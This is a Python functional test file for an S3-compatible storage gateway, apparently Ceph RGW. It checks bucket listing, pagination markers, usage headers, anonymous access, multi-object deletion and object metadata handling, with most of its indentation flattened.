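# e.g. an element tree like <Summary><QuotaMaxBytes>-1</QuotaMaxBytes></Summary>
# is converted to {'Summary': {'QuotaMaxBytes': '-1'}}.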
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get usage by client')
@attr(assertion='account usage api')
@attr('fails_on_aws') # the account usage API is a non-standard RGW extension
def test_account_usage():
# boto3.set_stream_logger(name='botocore')
client = get_client()
    # appends the usage query parameter to the request URL
def add_usage(**kwargs):
kwargs['params']['url'] += "?usage"
client.meta.events.register('before-call.s3.ListBuckets', add_usage)
client.meta.events.register('after-call.s3.ListBuckets', get_http_response_body)
client.list_buckets()
xml = ET.fromstring(http_response_body.decode('utf-8'))
parsed = parseXmlToJson(xml)
summary = parsed['Summary']
eq(summary['QuotaMaxBytes'], '-1')
eq(summary['QuotaMaxBuckets'], '1000')
eq(summary['QuotaMaxObjCount'], '-1')
eq(summary['QuotaMaxBytesPerBucket'], '-1')
eq(summary['QuotaMaxObjCountPerBucket'], '-1')
@attr(resource='bucket')
@attr(method='head')
@attr(operation='get usage by client')
@attr(assertion='account usage by head bucket')
@attr('fails_on_aws') # the RGW usage headers are a non-standard extension
def test_head_bucket_usage():
# boto3.set_stream_logger(name='botocore')
client = get_client()
bucket_name = _create_objects(keys=['foo'])
    # capture the raw HTTP response so the RGW usage headers can be inspected
client.meta.events.register('after-call.s3.HeadBucket', get_http_response)
client.head_bucket(Bucket=bucket_name)
hdrs = http_response['headers']
eq(hdrs['X-RGW-Object-Count'], '1')
eq(hdrs['X-RGW-Bytes-Used'], '3')
eq(hdrs['X-RGW-Quota-User-Size'], '-1')
eq(hdrs['X-RGW-Quota-User-Objects'], '-1')
eq(hdrs['X-RGW-Quota-Max-Buckets'], '1000')
eq(hdrs['X-RGW-Quota-Bucket-Size'], '-1')
eq(hdrs['X-RGW-Quota-Bucket-Objects'], '-1')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='bucket list unordered')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
def test_bucket_list_unordered():
# boto3.set_stream_logger(name='botocore')
keys_in = ['ado', 'bot', 'cob', 'dog', 'emu', 'fez', 'gnu', 'hex',
'abc/ink', 'abc/jet', 'abc/kin', 'abc/lax', 'abc/mux',
'def/nim', 'def/owl', 'def/pie', 'def/qed', 'def/rye',
'ghi/sew', 'ghi/tor', 'ghi/uke', 'ghi/via', 'ghi/wit',
'xix', 'yak', 'zoo']
bucket_name = _create_objects(keys=keys_in)
client = get_client()
# adds the unordered query parameter
def add_unordered(**kwargs):
kwargs['params']['url'] += "&allow-unordered=true"
client.meta.events.register('before-call.s3.ListObjects', add_unordered)
# test simple retrieval
response = client.list_objects(Bucket=bucket_name, MaxKeys=1000)
unordered_keys_out = _get_keys(response)
eq(len(keys_in), len(unordered_keys_out))
    eq(sorted(keys_in), sorted(unordered_keys_out))  # list.sort() returns None, so compare sorted copies
# test retrieval with prefix
response = client.list_objects(Bucket=bucket_name,
MaxKeys=1000,
Prefix="abc/")
unordered_keys_out = _get_keys(response)
eq(5, len(unordered_keys_out))
# test incremental retrieval with marker
response = client.list_objects(Bucket=bucket_name, MaxKeys=6)
unordered_keys_out = _get_keys(response)
eq(6, len(unordered_keys_out))
# now get the next bunch
response = client.list_objects(Bucket=bucket_name,
MaxKeys=6,
Marker=unordered_keys_out[-1])
unordered_keys_out2 = _get_keys(response)
eq(6, len(unordered_keys_out2))
# make sure there's no overlap between the incremental retrievals
intersect = set(unordered_keys_out).intersection(unordered_keys_out2)
eq(0, len(intersect))
# verify that unordered used with delimiter results in error
e = assert_raises(ClientError,
client.list_objects, Bucket=bucket_name, Delimiter="/")
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='bucket list unordered')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
@attr('list-objects-v2')
def test_bucket_listv2_unordered():
# boto3.set_stream_logger(name='botocore')
keys_in = ['ado', 'bot', 'cob', 'dog', 'emu', 'fez', 'gnu', 'hex',
'abc/ink', 'abc/jet', 'abc/kin', 'abc/lax', 'abc/mux',
'def/nim', 'def/owl', 'def/pie', 'def/qed', 'def/rye',
'ghi/sew', 'ghi/tor', 'ghi/uke', 'ghi/via', 'ghi/wit',
'xix', 'yak', 'zoo']
bucket_name = _create_objects(keys=keys_in)
client = get_client()
# adds the unordered query parameter
def add_unordered(**kwargs):
kwargs['params']['url'] += "&allow-unordered=true"
    client.meta.events.register('before-call.s3.ListObjectsV2', add_unordered)
# test simple retrieval
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=1000)
unordered_keys_out = _get_keys(response)
eq(len(keys_in), len(unordered_keys_out))
    eq(sorted(keys_in), sorted(unordered_keys_out))  # list.sort() returns None, so compare sorted copies
# test retrieval with prefix
response = client.list_objects_v2(Bucket=bucket_name,
MaxKeys=1000,
Prefix="abc/")
unordered_keys_out = _get_keys(response)
eq(5, len(unordered_keys_out))
# test incremental retrieval with marker
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=6)
unordered_keys_out = _get_keys(response)
eq(6, len(unordered_keys_out))
# now get the next bunch
response = client.list_objects_v2(Bucket=bucket_name,
MaxKeys=6,
StartAfter=unordered_keys_out[-1])
unordered_keys_out2 = _get_keys(response)
eq(6, len(unordered_keys_out2))
# make sure there's no overlap between the incremental retrievals
intersect = set(unordered_keys_out).intersection(unordered_keys_out2)
eq(0, len(intersect))
# verify that unordered used with delimiter results in error
    e = assert_raises(ClientError,
                      client.list_objects_v2, Bucket=bucket_name, Delimiter="/")
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='invalid max_keys')
def test_bucket_list_maxkeys_invalid():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
# adds invalid max keys to url
# before list_objects is called
def add_invalid_maxkeys(**kwargs):
kwargs['params']['url'] += "&max-keys=blah"
client.meta.events.register('before-call.s3.ListObjects', add_invalid_maxkeys)
e = assert_raises(ClientError, client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='no pagination, no marker')
def test_bucket_list_marker_none():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
eq(response['Marker'], '')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='no pagination, empty marker')
def test_bucket_list_marker_empty():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='')
eq(response['Marker'], '')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='no pagination, empty continuationtoken')
@attr('list-objects-v2')
def test_bucket_listv2_continuationtoken_empty():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, ContinuationToken='')
eq(response['ContinuationToken'], '')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list keys with list-objects-v2')
@attr(assertion='no pagination, non-empty continuationtoken')
@attr('list-objects-v2')
def test_bucket_listv2_continuationtoken():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response1 = client.list_objects_v2(Bucket=bucket_name, MaxKeys=1)
next_continuation_token = response1['NextContinuationToken']
response2 = client.list_objects_v2(Bucket=bucket_name, ContinuationToken=next_continuation_token)
eq(response2['ContinuationToken'], next_continuation_token)
eq(response2['IsTruncated'], False)
key_names2 = ['baz', 'foo', 'quxx']
keys = _get_keys(response2)
eq(keys, key_names2)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list keys with list-objects-v2')
@attr(assertion='no pagination, non-empty continuationtoken and startafter')
@attr('list-objects-v2')
def test_bucket_listv2_both_continuationtoken_startafter():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response1 = client.list_objects_v2(Bucket=bucket_name, StartAfter='bar', MaxKeys=1)
next_continuation_token = response1['NextContinuationToken']
response2 = client.list_objects_v2(Bucket=bucket_name, StartAfter='bar', ContinuationToken=next_continuation_token)
eq(response2['ContinuationToken'], next_continuation_token)
eq(response2['StartAfter'], 'bar')
eq(response2['IsTruncated'], False)
key_names2 = ['foo', 'quxx']
keys = _get_keys(response2)
eq(keys, key_names2)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='non-printing marker')
def test_bucket_list_marker_unreadable():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='\x0a')
eq(response['Marker'], '\x0a')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='non-printing startafter')
@attr('list-objects-v2')
def test_bucket_listv2_startafter_unreadable():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='\x0a')
eq(response['StartAfter'], '\x0a')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='marker not-in-list')
def test_bucket_list_marker_not_in_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='blah')
eq(response['Marker'], 'blah')
keys = _get_keys(response)
eq(keys, [ 'foo','quxx'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='startafter not-in-list')
@attr('list-objects-v2')
def test_bucket_listv2_startafter_not_in_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='blah')
eq(response['StartAfter'], 'blah')
keys = _get_keys(response)
eq(keys, ['foo', 'quxx'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='marker after list')
def test_bucket_list_marker_after_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='zzz')
eq(response['Marker'], 'zzz')
keys = _get_keys(response)
eq(response['IsTruncated'], False)
eq(keys, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='startafter after list')
@attr('list-objects-v2')
def test_bucket_listv2_startafter_after_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='zzz')
eq(response['StartAfter'], 'zzz')
keys = _get_keys(response)
eq(response['IsTruncated'], False)
eq(keys, [])
def _compare_dates(datetime1, datetime2):
"""
    zeroes out the microseconds on datetime1, then compares it to datetime2
"""
# both times are in datetime format but datetime1 has
# microseconds and datetime2 does not
datetime1 = datetime1.replace(microsecond=0)
eq(datetime1, datetime2)
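# e.g. _compare_dates(datetime.datetime(2015, 1, 1, 12, 0, 0, 123456),
#                     datetime.datetime(2015, 1, 1, 12, 0, 0)) passes, because the
# microseconds on the first argument are dropped before comparing.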
@attr(resource='object')
@attr(method='head')
@attr(operation='compare w/bucket list')
@attr(assertion='return same metadata')
def test_bucket_list_return_data():
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
data = {}
for key_name in key_names:
obj_response = client.head_object(Bucket=bucket_name, Key=key_name)
acl_response = client.get_object_acl(Bucket=bucket_name, Key=key_name)
data.update({
key_name: {
'DisplayName': acl_response['Owner']['DisplayName'],
'ID': acl_response['Owner']['ID'],
'ETag': obj_response['ETag'],
'LastModified': obj_response['LastModified'],
'ContentLength': obj_response['ContentLength'],
}
})
response = client.list_objects(Bucket=bucket_name)
objs_list = response['Contents']
for obj in objs_list:
key_name = obj['Key']
key_data = data[key_name]
eq(obj['ETag'],key_data['ETag'])
eq(obj['Size'],key_data['ContentLength'])
eq(obj['Owner']['DisplayName'],key_data['DisplayName'])
eq(obj['Owner']['ID'],key_data['ID'])
_compare_dates(obj['LastModified'],key_data['LastModified'])
# amazon is eventually consistent, retry a bit if failed
def check_configure_versioning_retry(bucket_name, status, expected_string):
client = get_client()
response = client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'MFADelete': 'Disabled','Status': status})
read_status = None
for i in range(5):
try:
response = client.get_bucket_versioning(Bucket=bucket_name)
read_status = response['Status']
except KeyError:
read_status = None
if (expected_string == read_status):
break
time.sleep(1)
eq(expected_string, read_status)
@attr(resource='object')
@attr(method='head')
@attr(operation='compare w/bucket list when bucket versioning is configured')
@attr(assertion='return same metadata')
@attr('versioning')
def test_bucket_list_return_data_versioning():
bucket_name = get_new_bucket()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(bucket_name=bucket_name,keys=key_names)
client = get_client()
data = {}
for key_name in key_names:
obj_response = client.head_object(Bucket=bucket_name, Key=key_name)
acl_response = client.get_object_acl(Bucket=bucket_name, Key=key_name)
data.update({
key_name: {
'ID': acl_response['Owner']['ID'],
'DisplayName': acl_response['Owner']['DisplayName'],
'ETag': obj_response['ETag'],
'LastModified': obj_response['LastModified'],
'ContentLength': obj_response['ContentLength'],
'VersionId': obj_response['VersionId']
}
})
response = client.list_object_versions(Bucket=bucket_name)
objs_list = response['Versions']
for obj in objs_list:
key_name = obj['Key']
key_data = data[key_name]
eq(obj['Owner']['DisplayName'],key_data['DisplayName'])
eq(obj['ETag'],key_data['ETag'])
eq(obj['Size'],key_data['ContentLength'])
eq(obj['Owner']['ID'],key_data['ID'])
eq(obj['VersionId'], key_data['VersionId'])
_compare_dates(obj['LastModified'],key_data['LastModified'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous)')
@attr(assertion='succeeds')
def test_bucket_list_objects_anonymous():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
unauthenticated_client = get_unauthenticated_client()
unauthenticated_client.list_objects(Bucket=bucket_name)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous) with list-objects-v2')
@attr(assertion='succeeds')
@attr('list-objects-v2')
def test_bucket_listv2_objects_anonymous():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
unauthenticated_client = get_unauthenticated_client()
unauthenticated_client.list_objects_v2(Bucket=bucket_name)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous)')
@attr(assertion='fails')
def test_bucket_list_objects_anonymous_fail():
bucket_name = get_new_bucket()
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous) with list-objects-v2')
@attr(assertion='fails')
@attr('list-objects-v2')
def test_bucket_listv2_objects_anonymous_fail():
bucket_name = get_new_bucket()
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.list_objects_v2, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='non-existent bucket')
@attr(assertion='fails 404')
def test_bucket_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='non-existent bucket with list-objects-v2')
@attr(assertion='fails 404')
@attr('list-objects-v2')
def test_bucketv2_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.list_objects_v2, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='non-existent bucket')
@attr(assertion='fails 404')
def test_bucket_delete_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.delete_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='non-empty bucket')
@attr(assertion='fails 409')
def test_bucket_delete_nonempty():
key_names = ['foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
e = assert_raises(ClientError, client.delete_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketNotEmpty')
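# Helpers for test_bucket_concurrent_set_canned_acl below: each worker thread
# issues one put_bucket_acl call and records True/False at its index in the
# shared results list; _do_wait_completion simply joins all of the threads.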
def _do_set_bucket_canned_acl(client, bucket_name, canned_acl, i, results):
try:
client.put_bucket_acl(ACL=canned_acl, Bucket=bucket_name)
results[i] = True
except:
results[i] = False
def _do_set_bucket_canned_acl_concurrent(client, bucket_name, canned_acl, num, results):
t = []
for i in range(num):
thr = threading.Thread(target = _do_set_bucket_canned_acl, args=(client, bucket_name, canned_acl, i, results))
thr.start()
t.append(thr)
return t
def _do_wait_completion(t):
for thr in t:
thr.join()
@attr(resource='bucket')
@attr(method='put')
@attr(operation='concurrent set of acls on a bucket')
@attr(assertion='works')
def test_bucket_concurrent_set_canned_acl():
bucket_name = get_new_bucket()
client = get_client()
num_threads = 50 # boto2 retry defaults to 5 so we need a thread to fail at least 5 times
# this seems like a large enough number to get through retry (if bug
# exists)
results = [None] * num_threads
t = _do_set_bucket_canned_acl_concurrent(client, bucket_name, 'public-read', num_threads, results)
_do_wait_completion(t)
for r in results:
eq(r, True)
@attr(resource='object')
@attr(method='put')
@attr(operation='non-existent bucket')
@attr(assertion='fails 404')
def test_object_write_to_nonexist_bucket():
key_names = ['foo']
bucket_name = 'whatchutalkinboutwillis'
client = get_client()
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='del')
@attr(operation='deleted bucket')
@attr(assertion='fails 404')
def test_bucket_create_delete():
bucket_name = get_new_bucket()
client = get_client()
client.delete_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.delete_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='read contents that were never written')
@attr(assertion='fails 404')
def test_object_read_not_exist():
bucket_name = get_new_bucket()
client = get_client()
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
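# botocore 'after-call' hook used by the error-response tests (and by
# test_head_bucket_usage above) to capture the most recent HTTP response,
# stored as a dict of its attributes (status, headers, body) in a global.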
http_response = None
def get_http_response(**kwargs):
global http_response
http_response = kwargs['http_response'].__dict__
@attr(resource='object')
@attr(method='get')
@attr(operation='read contents that were never written to raise one error response')
@attr(assertion='RequestId appears in the error response')
def test_object_requestid_matches_header_on_error():
bucket_name = get_new_bucket()
client = get_client()
# get http response after failed request
client.meta.events.register('after-call.s3.GetObject', get_http_response)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='bar')
response_body = http_response['_content']
resp_body_xml = ET.fromstring(response_body)
request_id = resp_body_xml.find('.//RequestId').text
assert request_id is not None
eq(request_id, e.response['ResponseMetadata']['RequestId'])
def _make_objs_dict(key_names):
objs_list = []
for key in key_names:
obj_dict = {'Key': key}
objs_list.append(obj_dict)
objs_dict = {'Objects': objs_list}
return objs_dict
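# e.g. _make_objs_dict(['key0', 'key1']) returns
# {'Objects': [{'Key': 'key0'}, {'Key': 'key1'}]}, which is the Delete payload
# expected by delete_objects().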
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects')
@attr(assertion='deletes multiple objects with a single call')
def test_multi_object_delete():
key_names = ['key0', 'key1', 'key2']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 3)
objs_dict = _make_objs_dict(key_names=key_names)
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects(Bucket=bucket_name)
assert 'Contents' not in response
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects(Bucket=bucket_name)
assert 'Contents' not in response
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects with list-objects-v2')
@attr(assertion='deletes multiple objects with a single call')
@attr('list-objects-v2')
def test_multi_objectv2_delete():
key_names = ['key0', 'key1', 'key2']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 3)
objs_dict = _make_objs_dict(key_names=key_names)
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects_v2(Bucket=bucket_name)
assert 'Contents' not in response
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects_v2(Bucket=bucket_name)
assert 'Contents' not in response
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects has upper limit of 1000 keys')
@attr(assertion='fails 400')
def test_multi_object_delete_key_limit():
key_names = [f"key-{i}" for i in range(1001)]
bucket_name = _create_objects(keys=key_names)
client = get_client()
paginator = client.get_paginator('list_objects')
pages = paginator.paginate(Bucket=bucket_name)
numKeys = 0
for page in pages:
numKeys += len(page['Contents'])
eq(numKeys, 1001)
objs_dict = _make_objs_dict(key_names=key_names)
e = assert_raises(ClientError,client.delete_objects,Bucket=bucket_name,Delete=objs_dict)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects has upper limit of 1000 keys with list-objects-v2')
@attr(assertion='fails 400')
def test_multi_objectv2_delete_key_limit():
key_names = [f"key-{i}" for i in range(1001)]
bucket_name = _create_objects(keys=key_names)
client = get_client()
paginator = client.get_paginator('list_objects_v2')
pages = paginator.paginate(Bucket=bucket_name)
numKeys = 0
for page in pages:
numKeys += len(page['Contents'])
eq(numKeys, 1001)
objs_dict = _make_objs_dict(key_names=key_names)
e = assert_raises(ClientError,client.delete_objects,Bucket=bucket_name,Delete=objs_dict)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write zero-byte key')
@attr(assertion='correct content length')
def test_object_head_zero_bytes():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='')
response = client.head_object(Bucket=bucket_name, Key='foo')
eq(response['ContentLength'], 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='write key')
@attr(assertion='correct etag')
def test_object_write_check_etag():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ETag'], '"37b51d194a7513e45b56f6524f2d51f2"')
@attr(resource='object')
@attr(method='put')
@attr(operation='write key')
@attr(assertion='correct cache control header')
def test_object_write_cache_control():
bucket_name = get_new_bucket()
client = get_client()
cache_control = 'public, max-age=14400'
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', CacheControl=cache_control)
response = client.head_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPHeaders']['cache-control'], cache_control)
@attr(resource='object')
@attr(method='put')
@attr(operation='write key')
@attr(assertion='correct expires header')
def test_object_write_expires():
bucket_name = get_new_bucket()
client = get_client()
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', Expires=expires)
response = client.head_object(Bucket=bucket_name, Key='foo')
_compare_dates(expires, response['Expires'])
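# helper: drain the streaming Body of a get_object response and return it as a str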
def _get_body(response):
body = response['Body']
got = body.read()
    if isinstance(got, bytes):
got = got.decode()
return got
@attr(resource='object')
@attr(method='all')
@attr(operation='complete object life cycle')
@attr(assertion='read back what we wrote and rewrote')
def test_object_write_read_update_read_delete():
bucket_name = get_new_bucket()
client = get_client()
# Write
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
# Read
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
# Update
client.put_object(Bucket=bucket_name, Key='foo', Body='soup')
# Read
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'soup')
# Delete
client.delete_object(Bucket=bucket_name, Key='foo')
def _set_get_metadata(metadata, bucket_name=None):
"""
    create a new bucket (or use the existing bucket whose name is given),
    write an object to it with the meta1 metadata property set to the
    specified value, then re-read the object and return that property
"""
if bucket_name is None:
bucket_name = get_new_bucket()
client = get_client()
metadata_dict = {'meta1': metadata}
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', Metadata=metadata_dict)
response = client.get_object(Bucket=bucket_name, Key='foo')
return response['Metadata']['meta1']
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-read')
@attr(assertion='reread what we wrote')
def test_object_set_get_metadata_none_to_good():
got = _set_get_metadata('mymeta')
eq(got, 'mymeta')
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-read')
@attr(assertion='write empty value, returns empty value')
def test_object_set_get_metadata_none_to_empty():
got = _set_get_metadata('')
eq(got, '')
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-write')
@attr(assertion='empty value replaces old')
def test_object_set_get_metadata_overwrite_to_empty():
bucket_name = get_new_bucket()
got = _set_get_metadata('oldmeta', bucket_name)
eq(got, 'oldmeta')
got = _set_get_metadata('', bucket_name)
eq(got, '')
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-write')
@attr(assertion='UTF-8 values passed through')
# TODO: the decoding of this unicode metadata is not happening properly for unknown reasons
@attr('fails_on_rgw')
def test_object_set_get_unicode_metadata():
bucket_name = get_new_bucket()
client = get_client()
def set_unicode_metadata(**kwargs):
kwargs['params']['headers']['x-amz-meta-meta1'] = u"Hello World\xe9"
client.meta.events.register('before-call.s3.PutObject', set_unicode_metadata)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
    got = response['Metadata']['meta1']
print(got)
print(u"Hello World\xe9")
eq(got, u"Hello World\xe9")
def _set_get_metadata_unreadable(metadata, bucket_name=None):
"""
    attempt to store a metadata value that contains unreadable (non-printing
    or non-UTF-8) characters and return the resulting ClientError; the server
    is expected to reject the request, typically with 400 Bad Request.
    """
    if bucket_name is None:
        bucket_name = get_new_bucket()
client = get_client()
metadata_dict = {'meta1': metadata}
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='bar', Metadata=metadata_dict)
return e
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-write')
@attr(assertion='non-UTF-8 values detected, but rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_non_utf8_metadata():
metadata = '\x04mymeta'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
    assert status in (400, 403)  # '400 or 403' always evaluates to 400; accept either status
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write')
@attr(assertion='non-printing prefixes rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_metadata_empty_to_unreadable_prefix():
metadata = '\x04w'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
    assert status in (400, 403)
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write')
@attr(assertion='non-printing suffixes rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_metadata_empty_to_unreadable_suffix():
metadata = 'h\x04'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
    assert status in (400, 403)
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write')
@attr(assertion='non-printing infixes rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_metadata_empty_to_unreadable_infix():
metadata = 'h\x04w'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
    assert status in (400, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='data re-write')
